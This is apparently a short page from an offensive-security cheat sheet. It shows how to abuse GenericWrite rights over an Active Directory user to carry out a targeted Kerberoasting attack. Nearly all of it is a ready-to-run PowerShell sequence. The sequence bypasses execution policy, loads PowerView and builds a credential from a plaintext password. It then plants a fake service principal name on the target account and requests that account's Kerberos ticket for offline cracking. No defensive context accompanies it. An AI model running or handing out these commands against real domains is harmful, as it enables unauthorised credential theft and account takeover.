githubEdit

GenericWrite - (over a user)

Kerberoasting Attack

powershell -ep bypass; Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Set-DomainObject -Credential $Cred -Identity 'krishna' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'krishna' -Credential $Cred | Select serviceprincipalname
$User = Get-DomainUser 'krishna' -Credential $Cred
$User | Get-DomainSPNTicket -Credential $Cred

Last updated